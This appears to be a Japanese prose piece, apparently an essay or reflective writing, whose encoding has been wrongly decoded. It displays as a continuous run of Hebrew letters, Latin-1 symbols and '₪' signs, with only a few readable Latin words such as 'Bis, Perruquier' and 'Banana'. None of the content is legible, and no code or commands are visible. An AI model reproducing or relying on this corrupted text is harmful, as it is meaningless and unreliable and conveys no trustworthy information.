ֽֽ₪₪כ½­µ₪₪ֿ½פ»ב₪־ֽ¾ְ¸₪ֻ¾ֳ₪¨₪¶₪כ₪₪²₪­₪ע₪¢₪¿₪¨₪כ₪ֱֻך°ד₪₪₪¡£₪­₪¿₪ף₪₪¯¸ְ₪¨₪׀¡¢ָא₪³₪½ֱ‏₪א₪₪­¥¿¥³₪ַ₪¢₪כ¡£¿ֽ´ײ₪־²¾ּּ₪ע₪³₪¦₪א₪ך¡¢ּח₪ֻ₪¢₪י₪ז₪כ°­·׳₪ע₪«₪¯₪¹₪ָ₪³₪ם₪־¥¿¥³₪ֿ₪¹₪₪ן₪ֱָא₪ֻ₪₪«₪₪י₪ּ₪־₪ַ₪¢₪כ¡£
    -¡¡½פ·¯¡¢ֽ¾₪ע₪µ₪·₪ֶכ״¹נ¡₪ײ₪³₪¯¡ֻ₪־₪½₪·₪ך₪ע₪ה₪ב₪¿₪₪¨¡¢₪₪ף₪ָ₪₪ל₪׀¡¢¿¿ֽ‎₪ֻ₪ֱ₪«₪ֳ₪ֶָא₪ֿ¥ֿ¥²₪¢₪¿₪₪ַ₪¢₪כ¡£₪₪×µ¿₪ן₪ף₪ָ₪»₪׀½פ·¯₪ט¡¢¥ׁ¥ךֹ¥ג¥ף¥¥כ¥ָ¥כ»°ָײֳֿ¡¢Bis, Perruquier ¥·¥ח¥×¥ײ»ב₪ֻ¹₪­₪¿₪₪¨¡£÷£₪עµק₪כ₪³₪ָ»ֽ½½ָ¬ַ¯ֱ°₪־₪³₪ָ₪₪ך¡¢₪ױ₪¿₪ך₪־ֶֻ¿ֽ־±³״ְ¸₪ֻ₪ט₪ֳ₪ֶ¥«¥ִ¥י₪־¹״¡₪¢₪¬₪¡ֻ₪ן₪ל₪¿₪כ₪³₪ָ₪עµ­²±₪»₪¶₪כ₪ה¡£₪ׂ₪ָ₪ך₪ֿ¥ֿ¥²₪¢₪¿₪₪ֻ₪·₪ֶָמֻ‏₪¹₪כ₪³₪ָ¥ײ¥¿»ש₪־₪´₪ָ₪¯¶עֻז¡₪°₪₪₪¡ֻ₪־ֱך₪ע₪¿₪ְ₪ט₪ן₪·¡¢₪½₪־ֽ§¿ֽ₪ֿ¹ץָ±ְּגָ¡₪ב₪₪₪₪¦¡ֻ₪־ָ‏¾¯ַ¯₪₪ך₪­¡¢₪ָ¡£¹ץָ±ְּגָ₪₪כֽ§¿ֽ₪³₪½₪¹₪₪ן₪ֱֽ¾₪ַ₪¢₪כ¡£¸«₪¿₪₪¨½פ·¯¡¢₪³₪³₪ֻ₪₪₪¿₪ֳ₪ֶָא₪ֿ²ֱּ³»ֽ½½ָ¬ַ¯°ֱ°₪ט₪ך¥ֿ¥²₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£₪¢₪¢₪¸₪ִ₪ֻ³´ֳ²₪־»ך₪ֻ₪¿₪¨₪ף₪ַ₪ֿ₪₪₪₪«¡×¡¡¹ג¾°₪₪כ₪³₪ָ¢¨¡₪«₪·₪ן¡ֻ₪־ּ₪־₪´₪ָ₪­½פ·¯₪ט¡¢½פ·¯₪ֿ₪₪¼ָא₪´₪ָ₪­ן־פ´ֱ¡₪ם₪¦₪ל₪ִ₪«₪ף¡ֻ₪עֳֿ¾ו₪ט₪ךֻהֻ׳₪»₪·₪ב₪ף₪ָ´ך₪ן₪¶₪כ₪«¡£ָא₪ֿ¥«¥ִ¥י₪ע₪ג₪ֳ₪ֶ₪½₪־¥ֿ¥²₪¢₪¿₪₪עגײֳו¡₪₪ף₪ֱ₪ד₪¯¡ֻ₪»₪ף₪ָ₪¹₪כ₪־₪ַ₪¢₪כ¡£
    -¡¡½פ·¯¡¢ָא₪ֽֿ¾₪־ֱ‏₪א₪₪­ְֵֿ¨₪ַ₪¢₪כ¡£₪¿₪ף₪₪כְֵֿ¨₪ַ₪¢₪כ₪«¡©¡¡₪₪₪ה₪₪₪ה₪₪₪¡£ְיױ₪₪₪¡£ֽ¾₪־ְ¸³ט₪־₪¹₪₪ֶ₪ֻ₪×₪₪₪ֶָא₪ֿ₪₪¿ֽ¾₪־ֱ‏₪א₪₪­₪«₪¿₪­₪ַ₪¢₪כ¡£₪¸₪ִ₪ֱֻ‏₪א₪₪­₪ַ₪¢₪כ₪«¡©¡¡₪·₪«₪ך₪¸₪ִ₪ֱֻ‏₪א₪₪­₪ַ₪¢₪כ¡×¡¡½פ·¯¡¢ָא₪־¶µֽ₪¿₪כ₪ה₪¢₪µ₪ֿ₪«₪·₪´₪¯₪ַ₪¢₪ך₪₪¹₪¾¡£₪«₪ך₪ֻ½פ·¯¡¢ֱןְּ₪₪כ₪³₪ְָ₪³¦ֳֿ¿₪־₪´₪ָ₪­½פ·¯₪ט¡¢½פ·¯₪ֿ³״¼±¿¼±ף₪₪כ¥¿¥³₪־ֲ¸÷₪עַ§ֶֽ₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪ַ₪¢₪ם₪¦₪«¡©¡¡₪₪₪ה₪₪₪ה₪₪₪¡¢ֻױ₪₪₪¡£ֽ¾₪ֿ₪³₪³₪ֻ´÷¡₪¢₪¨¡ֻ₪ֶָא₪־ּµ³״₪ע¸ר³«₪»₪ף₪ָ₪¹₪כ₪ג₪־₪ַ₪¢₪כ¡£
    -¡¡½פ·¯₪ֶֿמ²₪₪־¾®ֹפֽמ¥׀¥¹¥¯₪עַ§¼±₪»₪י₪כ₪כ₪ַ₪¢₪ם₪¦₪«¡©¡¡₪ג₪·₪ג½פ·¯₪¬¥ױ¥י¥ף¥¹¡¢¥¹¥¥₪¥ף־¾¹ס₪־¹ס¶­₪ע₪₪¹¥װ¥ל¥ֽ¡¼»³ּ®₪ע₪µ₪₪ט₪¦₪₪י₪׀¡¢½פ·¯₪ֿ»³ֳז₪ֻ»¶÷₪¹₪כ¾®ֹפֽמ¥׀¥¹¥¯₪ֻ°©ֳו¡₪₪¦₪ֱ₪ד₪¯¡ֻ₪¹₪כ₪־₪ַ₪¢₪כ¡£₪³₪־ֱִ´ס₪₪כֹפֽמ₪ֿ¡¢¿ֽ¼ן¡¢ֹקֲ¯¡¢¸ְ¸ל₪ֻ₪×₪₪₪ְֶ¾²₪₪־ֱ´¿ֽ¼ן₪ֻ³ײְה₪·¡¢₪¸₪ִ₪ֳֻֿµו₪־ָ¾²ףֵ¾₪ע₪³₪³₪ם₪₪ֶ₪־₪ֱ¡¢¶ֵֻל₪¸₪ד₪₪ף¹ס₪ֻ₪₪₪¿₪ֳ₪ֶ₪ֿ₪¸₪ב₪ֶ₪₪₪ֱ₪¸₪כ₪·₪­־א»ק₪ע¸«₪₪₪ְ₪¹₪־₪ַ₪¢₪כ¡£₪³₪לֽ¾₪־¸¦µז´°ְ®₪¹₪כ₪³₪ָ₪₪¯₪·₪ֶ₪ֿ¡¢ֳֿµו₪־²רֳּ₪ָ₪·₪ֶ¿¼₪¯½פ»ב₪־¿´ְֳ₪ע´¨₪«₪י₪·₪ב₪¿₪ֱֻך°ד₪₪₪¡£₪·₪«₪·₪ֶ½פ·¯°ֲ₪ף₪¼₪ט¡¢ֽ¾₪־¸¦µז₪ֿ´°ְ®₪·¡¢ְ₪³¦¿ֲֿ₪ֻ°־ֲח₪₪כ¹׳¸¥₪ע₪¢₪¿₪¨₪¿₪־₪ַ₪¢₪כ¡£¸«₪¿₪₪¨¡¢¸»µֱ·׀₪ֿ¥¸¥ף¥®¥¹¥«¥ף₪ָ₪₪ֳ₪¿₪־₪ַ₪¢₪כ¡£¥¸¥ף¥®¥¹¥«¥ף₪ֿ²₪½£₪ע¿¯־¬₪·¡¢¥¹¥¥₪¥ף₪ֻ₪₪₪¿₪ֳ₪ֶ₪½₪־¾ֲֳ©₪ע₪¦₪·₪₪¦₪¿₪־₪ַ₪¢₪כ¡£₪·₪«₪ך¡¢µֱ·׀₪×₪ט₪׃₪½₪־°לֵ₪ֿ¥װ¥ל¥ֽ¡¼»³ֳז₪ג₪ֳ₪ָ₪גµ₪¸ץ₪־²¹½ח₪₪כ₪ָ₪³₪ם₪ֻֿ·¸ו₪־±£ְ´¡₪₪₪ף₪»₪₪¡ֻ₪עֻ־¡₪₪¯¡ֻ₪·₪¿₪־₪ַ₪¢₪כ¡£₪³₪ל₪¹₪₪ן₪ֱ¥׀¥¹¥¯³«ןף¡₪«₪₪₪׃₪ד₪¯¡ֻ₪־־ע»ֻ₪ַ₪¢₪כ¡£₪·₪«₪כ₪ֻ₪¢₪¢¡¢₪«₪־₪ײ₪ל₪₪₪₪כ¥¿¥³ַמ»־₪ֹֿװֲ½ְיֻ₪ֻ₪גֽ¾₪־°־ֲח₪₪כ¶ְָ׃₪ֻ°ְֿ₪ע₪ָ₪₪¨₪¿₪־₪ַ₪¢₪כ¡£ָא₪ֿ₪₪₪ן₪¯₪¯¡¢¥ג¥ף¥´¥כ₪־²₪½£¿¯־¬₪ֿ¥¸¥ף¥®¥¹¥«¥ף₪־¸ו·ׁ¼װְֲ½¡₪־»צְ״₪ֻ₪«₪«₪ך¡¢¥¸¥ף¥®¥¹¥«¥ף₪־»א¸ו½½ַ¯₪־¸ו₪ֻ₪¢₪¿₪כ¡¢₪ָ¡£₪¸₪ִ₪ֻ²¿₪¿₪כ¶עְְֿץ¼±₪ַ₪¢₪ם₪¦₪«¡£¼÷₪ן₪ל₪¿₪כ־ע»ֻ₪ֻ₪×₪₪₪ֶ¡¢₪¿₪ף₪₪כ½½ַ¯₪¬₪₪ף₪ַ₪¢₪כ₪«¡×¡¡₪¸₪ִ₪ֻ₪³₪ל־ע»ֻ₪־ֽ©¸¼₪עֱֲֶֻ₪¹₪כ₪ג₪ֿ₪₪ֿ₪ְ₪·₪₪₪ַ₪ֿ₪₪₪₪«¡£
    -¡¡₪µ₪ֶ½פ·¯¡¢ָא₪־°­ֱֶ₪ע־ףµף₪¹₪כ₪ֽֿ¾₪־₪ֿ₪₪ֿ₪ְֹװֻ°ױ₪ָ₪¹₪כ₪ָ₪³₪ם₪ַ₪¢₪כ¡£₪₪ף₪ָ₪₪ל₪׀¡¢₪½₪־ָָ¹װ₪ֿ´סֱֵ·³°₪ֻ₪·₪ֶ¼±¼װ₪־¾ן¼±₪ע₪¬₪¨₪ף₪¼₪·₪ב₪÷¡¢₪א₪·₪םֽ¾₪ֲֻ׀₪·₪ֶכ״¹נ₪־ָנ₪עָ¯₪»₪·₪א₪כ₪¦₪י₪₪¢₪כ₪«₪י₪ַ₪¢₪כ¡£₪¿₪ָ₪¨₪׀½פ·¯¡¢÷¢ֶ¡₪±₪₪₪¸₪ִ¡ֻֽ¾₪־¸ֽ¸‎₪ֻ Banana ₪־ָי₪ע»¶ֹ₪·ֽ¾₪־»¦³²₪ע₪¯₪ן₪ְ₪ֶ₪¿₪־₪גָא₪־‎ְ£₪ֱֻך°ד₪₪₪¡£₪ז₪«₪₪₪ֻ₪גֽ¾₪ֿח½ֹפ¡₪ַ₪ף₪ײ¡ֻ₪×₪ט₪׃¸×זנ¹¡₪±₪ף₪³₪¦₪³₪ִ¡ֻ₪ֻ·ָש₪₪כֲַֻ׀½‎₪ע₪¦₪±₪·₪־₪₪ֻ₪ֶַ¾¿ּג»¡₪־₪¦₪·₪ף₪ָ₪¦¡ֻ₪־ָן³²₪ע₪³₪¦₪א₪כ₪ֻ₪ֿ₪₪₪¿₪י₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ₪¬¡¢ֽ¾₪־¹נֱ₪ֲֻ׀₪·ְ₪¿ֽ₪ֿ₪¢₪²₪ֶֽ¾₪עֵַֽ₪·₪¿₪־₪ַ₪¢₪כ¡£½פ·¯₪ֿ₪ט₪¯ֽ¾₪־ָב₪·₪₪ע₪ֿ₪«₪ך₪¦₪כ₪ַ₪¢₪ם₪¦₪«¡£
    -¡¡¸­ְּ₪ֻ₪·₪ְֶµֲח₪₪כ₪³₪ְֲָ¿ֽ־₪־₪´₪ָ₪­½פ·¯₪ט¡£½פ·¯₪ֿ₪³₪־ָבִֻ₪₪כִ״»צ¡₪ֱ₪ף₪¸¡ֻ₪ע₪גּ»¦₪¹₪כ₪ַ₪¢₪ם₪¦₪«¡£₪¹₪₪ן₪ֱָא₪ֽֿ¾₪־÷₪ע₪ֽ₪ָ₪ֳ₪¿₪־₪ַ₪¢₪כ¡×¡¡₪·₪«₪·₪ֶ½פ·¯¡¢₪ױ₪¿₪¿₪׃ְֹּׂ₪₪כ₪³₪ָ¿¨ע₪¡₪·₪ח₪¯₪·₪ו¡ֻ₪־₪´₪ָ₪­½פ·¯₪ט¡£ֽ¾₪־÷₪ֿ₪¦₪כ₪ן₪·₪­₪³₪ָ¹ג»³¿¢×₪־₪´₪ָ₪¯¡¢₪¸₪ִ₪ֻ₪¿₪ף₪₪כ¿¢×₪ַ₪ֿ₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡×¡¡₪¢₪¢»°ֵ־הְֵ₪₪כ₪³₪ְָנֹקµ¡₪־₪´₪ָ₪­½פ·¯₪ט¡¢₪«₪־ֱ‏₪א₪₪­¥¿¥³ַמ»־₪ֿ₪₪ף₪י₪־°¦₪₪¯₪·₪ֶֽ¾₪־÷₪ע₪¦₪׀₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪₪ף₪ָ₪₪ל₪׀½פ·¯¡¢₪¢₪¢½פ·¯±±ף₪ֻ¥¿¥³₪₪כֶ°×₪ְֻן״ֻ₪»₪ט¡¢₪¹₪₪ן₪ֱֽ¾₪־÷₪ֿ¥׀¥¹¥¯ְ¸₪₪ל₪־½קְ­₪ַ₪¢₪ֳ₪¿¡£ָא₪־½ק₪ֽֿ¾₪־¸¦µז₪ע½ץ₪¯₪כ₪³₪ָ¡¢₪¦₪¿₪¬₪₪₪ג₪₪¯ֳֿ₪־±צ₪ַ₪¢₪ֳ₪¿₪־₪ַ₪¢₪כ¡£¥¿¥³ַמ»־₪ֿ₪³₪־ְֵ₪ֻ¿¼₪¯ּ₪ע₪ִ₪±₪¿₪־₪ַ₪¢₪כ¡£₪¢₪¢¡¢ְי־¸₪־°ל¼÷₪ַ₪¢₪כ¡£₪·₪«₪ך¡¢ְי־¸₪־°ל¼÷₪ַ₪¢₪כ¡£ֽ¾₪ֹֿװ³׀₪ֻ₪ג¡¢¥¿¥³ַמ»־₪־¥ֿ¥²₪¢₪¿₪₪₪כ»צ¼ֲ₪עֽ¾₪־÷₪ֻ¶µ₪¨₪ֶ₪×₪«₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ₪½₪־₪¿₪ב₪ֹֻװ¹¬₪₪כָא₪־½ק₪ֿ₪ִ₪₪₪ֻ¥¿¥³ַמ»־₪ֻהֶֽם¡₪ם₪¦₪י₪¯¡ֻ₪»₪י₪ל₪¿₪־₪ַ₪¢₪כ¡£
    -¡¡₪³₪³₪ֻ₪×₪₪₪ֶ₪«½פ·¯¡¢ֽ¾₪ֿ₪ױ₪ף₪¼₪ף½³µ¯¡₪±₪ֳ₪­¡ֻ₪·₪¿₪־₪ַ₪¢₪כ¡£ֲֵַ¥¿¥³¡×¡¡¥¿¥³ַמ»־₪ע₪₪¦₪א₪ל¡¢₪·₪«₪ך¡¢ח¿ִ¨¡₪ט₪¦₪ֱ₪ח₪¦¡ֻ₪»₪ט¡¢ֱ‏₪א₪₪­°­ֱֶ´ֱ¡×¡¡₪·₪«₪ך₪·₪«₪ך¡£₪ז₪¨₪ֻֽ¾₪ֶּֿכ₪½₪־‎÷צ₪ע₪ֽ₪ֳ₪¿₪־₪ַ₪¢₪כ¡£½פ·¯₪ֿ₪¹₪ַ₪ֻ¡¢ְµֵצ₪₪כ¹¶·ג₪ֿ₪ׂ₪ָ₪ִ₪ָ₪·₪ֶָא₪־כּ·׳¡₪­₪±₪₪¡ֻ₪ֵֻ¨₪·₪¬₪¿₪₪₪ז₪¨₪ף₪ע־»²ע₪»₪י₪ל₪¿₪ֻ₪ֱ₪¬₪₪₪₪₪¡£₪·₪«₪·₪ֶ÷£₪ה¡¢₪ז₪₪₪₪₪ִ÷צ₪עֳֿ¾ו₪ֻ¸«₪₪₪ְ₪¹₪־₪₪ַ₪¢₪כ¡£₪·₪«₪ך¡¢₪¿₪ְ°ל÷צ₪ַ₪¢₪כ¡£₪ז₪¨₪ֻֽ¾₪ֿ¿¼₪¯·ט°ױ₪ע₪«₪¿₪ב¡¢ִ»ֲַ₪ֱֻ¹₪ֲֻּּ־₪ע₪«₪¯₪·₪ֶ₪־₪ֱּכ±¢₪ֻ¾ט₪¸₪ֶָא₪־ֵ¡ֲנ₪ֻ₪·₪־₪׃ֶ‏₪ֳ₪¿₪־₪ַ₪¢₪כ¡£ִ¹ּכ₪ֻ₪ן₪¿₪ֳ₪ֶֽ¾₪ֿ¡¢¾ֱ°₪ֻ´״₪¹₪כ₪×₪ט₪½₪¢₪י₪ז₪כ¸¦µז½ס₪עֶַֹֻ₪·₪ֶ₪×₪₪₪¿₪־₪ַ₪¢₪כ¡£₪½₪־₪¿₪ב₪ֻ¡¢ֽ¾₪ֿ¶ץµ₪₪־₪´₪ָ₪¯ָא₪־¿²¼¼₪ֻ¿¯ֶ‏₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪¿₪־₪ַ₪¢₪כ¡£₪½₪·₪ֶ½פ·¯¡¢ֽ¾₪ֿ₪₪ף₪־₪¿₪ן₪₪₪ג₪₪¯₪«₪־ֱ‏₪א₪₪­¥«¥ִ¥י₪עֽ¾₪־¾¸ֳז₪ֻ₪×₪µ₪ב₪¿₪־₪ַ₪¢₪כ¡£½פ·¯¡¢ֱּ°₪ֻֿ×½׀₪¹₪כּµּ׃ְײ¿§₪־²ר×₪עַ§₪ב₪¿»‏₪ֻ¡¢ֽ¾₪ֿ₪¸₪ִ₪ֻֻ´¶¶»₪ֻ₪»₪₪ך¡¢₪¢₪ױ₪ל½׀₪כ־₪ע¶״₪¸ֶס₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡£½פ·¯₪ט¡¢ֽגֶ₪־ּכְּ₪±₪ע´₪·₪ֶ¡¢₪«₪־ֱ‏₪א₪₪­¥¿¥³₪ֿ₪ִ₪₪₪ֻ¥¿¥³₪¸₪¿₪₪₪־ְµֲ־₪ע₪₪₪«₪ף₪₪¯ֻ½ֿ×₪¹₪כ₪ֻ₪₪₪¿₪כ₪ַ₪¢₪ם₪¦¡×¡¡ֽ¾₪ֿ₪×₪ֹ₪כ¶»₪ֻ¥«¥ִ¥י₪ע₪ׂ₪½₪ב₪ֶ¡¢₪ױ₪¿₪¿₪׃±ֶ₪־₪´₪ָ₪¯ַ¦₪׃½׀₪¿₪־₪ַ₪¢₪כ¡£
    -¡¡₪·₪«₪כ₪ֻ½פ·¯¡¢₪¢₪¢½פ·¯¡¢₪×₪×½פ·¯¡¢ֽ¾₪ַֿװֻּ₪·₪¿₪־₪ַ₪¢₪כ¡£°­־¬¿ְ₪־₪´₪ָ₪·₪ָ₪ֿ₪³₪ל₪«¡£₪¢₪¢¥¿¥³₪ֿ¥¯¥»¥ג¥־₪־ֳז₪־¥¯¥»¥ג¥־₪ַ₪¢₪כ¡£₪ְ₪ל₪«₪ט₪¯ָא₪־¿¼ֵֻ±ף־¸₪עֽ½ֲ¬₪·₪¦₪כ₪ַ₪¢₪ם₪¦₪«¡£ֽגֶָא₪־¥ֿ¥²₪¢₪¿₪₪ֿ₪ױ₪¿₪¿₪׃¥«¥ִ¥י₪ֻ±£₪µ₪ל₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£₪¸₪ִ₪ֻ½פ·¯¡¢ָא₪ֿ₪ׂ₪½₪«₪ֻּ₪־¥«¥ִ¥י₪עֳשֲ¢₪·₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£ֽ¾₪ֹֿי₪±₪¿₪ךגד¡£ֵבְ₪לּנ¿װ₪­₪¿₪ךגד¡£ֽ¾₪־־ֿ₪ע₪ג₪ֳ₪ֶ₪·₪ֶ¡¢ָא₪־°­־¬₪ֻ₪×₪ט₪׀₪¶₪כ₪³₪ָ₪¹₪ַ₪ְַֻּע₪₪ךגד¡£½פ»ב₪ט¡¢₪ְ₪ל¿ֽ₪«₪ט₪¯¥¿¥³₪עִ¨¡₪³₪י¡ֻ₪¹ֽ¦»־₪₪­₪ה¡£¥¿¥³ַמ»־₪ע₪₪¦₪א₪ל¡×¡¡ָא₪ע¿₪₪כֳֿ¾ו₪ט₪ךֻץ»¦₪»₪ט¡×¡¡½פ·¯₪ְֿµµֱ₪ע°¦₪µ₪¶₪כ₪«¡×¡¡₪¢₪¢₪ה₪א₪ע₪¨₪ף₪·₪ְ₪₪₪ַ₪¢₪כ¡£₪·₪«₪י₪׀ֽ¾₪־‎₪ט₪ך¾ֳ₪¨µמ₪כ₪³₪ָ₪ֻ₪­₪ב₪¿¡£₪¢₪¢ָב₪·₪₪₪«₪¡£

    - -

    ¡¡½פ·¯₪ֿ°־ֲח₪₪כֶ±ַמ»־₪־°ה½ס₪עֶֹ₪ף₪ַ¡¢₪ֹ₪ף₪₪ֻ₪ױ₪«₪₪´¶ֶ°₪ע₪ג₪ט₪×₪µ₪ל₪¿₪ַ₪¢₪ם₪¦₪«¡©¡¡₪½₪·₪ֶ₪ֹ₪ף₪₪ֻ₪ֿ₪²₪·₪₪ֵ₪ך₪ע₪×₪₪¨₪י₪ל₪¿₪ַ₪¢₪ם₪¦₪«¡©¡¡₪₪¯₪ֻ₪ֿ₪ט₪¯₪×»¡₪·₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪כ₪־₪ַ₪¢₪כ¡£°־ֲח₪₪כֹקַמ»־₪ֿ₪«₪¯₪ֶ¼«»¦₪·₪¿₪־₪ַ₪¢₪כ¡£₪·₪«₪ך¡¢°־ֲח₪₪כֹקַמ»־₪ֿ₪ֿ₪¿₪·₪ֶ»א₪ף₪ְ₪־₪ַ₪¢₪כ¡£₪­₪ן₪ב₪ֶֹװ²ִ²ע₪‎ֻ¡₪ֻ₪ט₪ֳ₪ֶ¡¢₪½₪·₪ֶ»אֲ־¡₪·₪¿₪₪¡ֻ₪ע»ִ₪µ₪₪₪‎ֻ¡₪ֻ₪ט₪ֳ₪ֶ¡¢₪½₪ל₪¬₪×₪³₪₪ן₪ל₪¿₪¿₪ב₪ֻ¡¢°לֹפ₪־¿ֽ₪׃₪ָ₪ֿ₪³₪ל₪ע₪¢₪ה₪·₪₪₪ָגֻ¡₪ֻ₪י¡ֻ₪ף₪ְ₪־₪ַ₪¢₪כ¡£₪¢₪¢₪₪¯₪ֿ₪¿₪₪₪״₪ף»ִַ°₪ַ₪¢₪כ¡£₪½₪ל₪ז₪¨₪₪¯₪ֿ₪ז₪₪₪₪₪ִ₪־ּ·ג¼װ₪ָ₪·₪ֶ¡¢°־ֲח₪₪כֹקַמ»־₪־־׳½×₪ע₪ִ₪ײ₪µ₪ֻ₪־₪₪¿₪₪₪ָ»׳₪¦₪־₪ַ₪¢₪כ¡£
    -¡¡°־ֲח₪₪כַמ»־₪ֿ₪ֿ₪₪ֿ₪ְ₪¢₪ן₪ֶ¼װ₪ַ₪¢₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪¿₪ָ₪¨₪׀÷£¡¢ֹפ²°₪־ְ¾ֶמֳ¼₪ֻ₪¢₪¿₪כִ¹¥₪¥¹₪ֻ¹ר₪«₪±₪ֶ°ל÷‎₪־½ס₪ֶֹֻ₪₪ױ₪±₪ֳ₪ֶ₪₪₪כ₪ָ²¾ִך₪¹₪כ₪־₪ַ₪¢₪כ¡£¼¡₪־½ײ´ײ₪ֻ¡¢°־ֲח₪₪כַמ»־₪ֵֿלֳֻּ¼₪־₪ׂ₪¸₪«₪±¥₪¥¹₪ֻ₪¦₪ג₪ל₪ֶ¡¢₪¸₪ִ₪ֻ₪¢₪ן₪¿₪ְ₪·₪¯¥¡¼¥¸₪ע₪¯₪ֳ₪ֶ₪₪₪כ₪־₪ַ₪¢₪כ¡£₪₪¿°־ֲח₪₪כַמ»־₪ֿ¿ו₪ע°₪א₪׀₪¢₪₪₪ֻ¡¢₪ָ₪ִ₪¸₪ח¥³¥ֳ¥׳₪ע₪־₪₪³₪ף₪ַ₪₪₪כ₪־₪ַ₪¢₪כ¡£½פ·¯₪ֿ₪½₪־₪ָ₪­¡¢₪¸₪ִ₪ֻ₪¢₪ן₪¿₪ְ₪·₪₪¸ו²ש₪ָ₪₪₪ֳ₪·₪ח₪ֻ₪¿₪½₪¬₪ל₪ֻ»ק₪¿ְִּ₪¬₪³₪־½ס÷״₪ֻ₪ָ₪¸₪³₪ג₪ג₪כ₪־₪עַ§₪ב₪י₪ל₪כ₪ֱֻך°ד₪₪₪¡£₪·₪¿₪¬₪ֳ₪ֶ¡¢₪³₪־₪¢₪ן₪¿₪ְ₪·₪₪ֹקִ¬₪ֿ¡¢₪³₪־ֹפ²°₪ֻ₪¢₪כ₪¹₪₪ֶ₪־×¼ֱ₪ע´¶²½₪»₪·₪ב₪÷₪ֻ₪×₪«₪₪«₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪¿₪ָ₪¨₪׀¡¢»‏·׳₪ֿ₪₪₪½₪¬₪·₪¯½½»°»‏₪עֲַ₪ֱ¡¢־יְבְµ₪·₪₪ֽטµׂ₪¬₪ג₪¸₪ג₪¸₪·₪ֶ¹ר₪ע²¼₪½₪¦₪ָ₪·₪₪₪»‏₪ֻ¥₪¥¹₪ֿ₪ֿ₪²₪·₪₪₪«₪ף₪·₪ד₪¯₪ע₪₪י₪·¡¢×ֲ־₪־ֱֹ₪¯±¢±ֶ₪ֿ₪ָ₪ִ₪¸₪חְֲֽ₪ֻ₪א₪«₪ֳ₪ֱֶצ₪ך½׀₪¹₪־₪ַ₪¢₪כ¡£₪¹₪₪ֶ₪³₪ל₪י₪־₪ם₪¦₪׀₪₪₪ֿ₪­₪ן₪ב₪ִֶ¾ְ‏ֵ×₪ֶֹֽק₪עֱֹ₪₪₪ֶ¸ע÷ר₪¹₪כ₪¿₪ב₪ֻ¡¢ֹפ²°₪־₪₪«₪ֻ₪ֿ²¿ֻ₪ג₪־ָפ₪ײּנ₪ֻ»ק₪¿¿¿¶ץ₪¬ֱ®¸ק¡₪»₪ף₪³₪¦¡ֻ₪ע₪ֱ₪י₪·₪ֱֶ₪₪₪ַ₪₪₪כ½¬´·₪ַ₪¢₪ֳ₪¿¡£₪ָ₪­₪ֻ₪ֹֿפ²°₪־ֳז±₪ֻ°ל¿״₪־־µ´¬₪¬ָא¼«¿ָ₪ג₪₪¿₪¢₪ן₪ֶ₪ױ₪¿₪ב₪₪₪ֶ₪ן₪­₪×₪³₪כ₪³₪ָ₪ג₪¢₪ֳ₪¿₪־₪ַ₪¢₪כ¡£₪½₪־₪»₪ִ₪°־ֲח₪₪כַמ»־₪ֿ₪·₪׀₪·₪׀₪³₪־־µ´¬₪ֻ´¬₪­₪³₪₪ל₪ֶ¡¢₪³₪ײ₪·₪ע₪ױ₪ך₪₪¬₪י₪₪₪½₪¬₪·₪¯₪ֱ₪ו₪¦₪¬₪¨₪ך₪עֲַ₪ִ₪־₪ַ₪¢₪ֳ₪¿¡£
    -¡¡₪µ₪ֶ¡¢»צ·ן₪־₪×₪³₪ֳ₪¿ֶ₪ֿ¡¢₪ֱ₪ח₪¦₪ֹ°־ֲח₪₪כַמ»־₪־·כ÷§¼°₪ֻ₪½₪¦₪ָ₪¦₪·₪ֶ₪₪₪¿¡£²ײ²ַ₪ֵֿצַ¯½½¼·÷׀₪־₪¿₪₪₪״₪ףָ‏₪·₪₪¾¯½ק₪ַ₪¢₪ֳ₪¿¡£°־ֲח₪₪כַמ»־₪¬ָא₪־½ק₪ֻּ₪ע₪ִ₪±₪¿₪־₪ֿ₪µ₪¹₪¬₪ֻ°־ֲח₪₪כ¸«¼±₪ָ₪₪₪ן₪ֽ₪׀₪₪י₪₪₪¡£₪₪ף₪ָ₪₪ל₪׀₪³₪־¾¯½ק₪ֿ¡¢³¹ֶ¬₪ֻ־©₪ֳ₪ֶ²ײ₪עַה₪ך₪₪¬₪י¡¢»°ֶ₪ָ₪₪₪¦₪ג₪־°לֻ₪־²ײ₪גַה₪ל₪₪«₪ֳ₪¿₪ֻ₪«₪«₪ן₪י₪÷¡¢¼ח₪ָ₪·₪ֶ±ְ₪ע₪₪¬₪ב¡¢₪ָ₪­₪¿₪¥ֽ¥×¥ף¥µ¥₪¥ף₪ע₪₪¬₪ב₪¿₪ֻ₪¹₪®₪ּ₪₪ָֹב·א₪ֲֻ׀₪·₪ֶ₪א₪¸₪ד₪­₪ַ₪¢₪ֳ₪¿¡£°־ֲח₪₪כַמ»־₪₪י₪׃₪ֻ°־ֲח₪₪כַמ»־₪₪ֹ₪־ֱֹ₪¯ְֹק₪ֲֻ׀¾ָ₪·₪ֶ¡¢₪³₪ל₪₪ֹ₪ױ₪µ₪ן₪·₪₪¾¯½ק₪ֿ₪₪ל₪ֻ₪·₪«¸«₪¢₪¿₪י₪₪₪₪־₪ַ₪¢₪כ¡£₪₪¯₪ֿ₪³₪־¹¬¡₪·כ÷§¼°₪ע½ֻ¡₪·₪ֶֻׂ»ױ₪־ּע₪ע₪ִ₪ָ₪ב¡¢ֶ±»‏₪ֻ¿©ֲמµכ»ֵ¿ֽ₪ָ₪₪כּףֲ«₪ַ₪¢₪ֳ₪¿¡£₪₪¯₪ֿ₪₪¯₪־½ס÷״₪ֻ÷׳ֳֵ₪ע₪ִ₪¯₪ך²ײ²ַ₪ָ₪א₪­₪¢₪»₪ֳֻ¼÷ֲ₪·₪ֶ°־ֲח₪₪כַמ»־₪־ֽט¾ל₪ע₪₪ֱ₪«₪₪¨₪ֶ₪₪₪¿₪־₪ַ₪¢₪כ¡£₪½₪־₪¦₪ֱ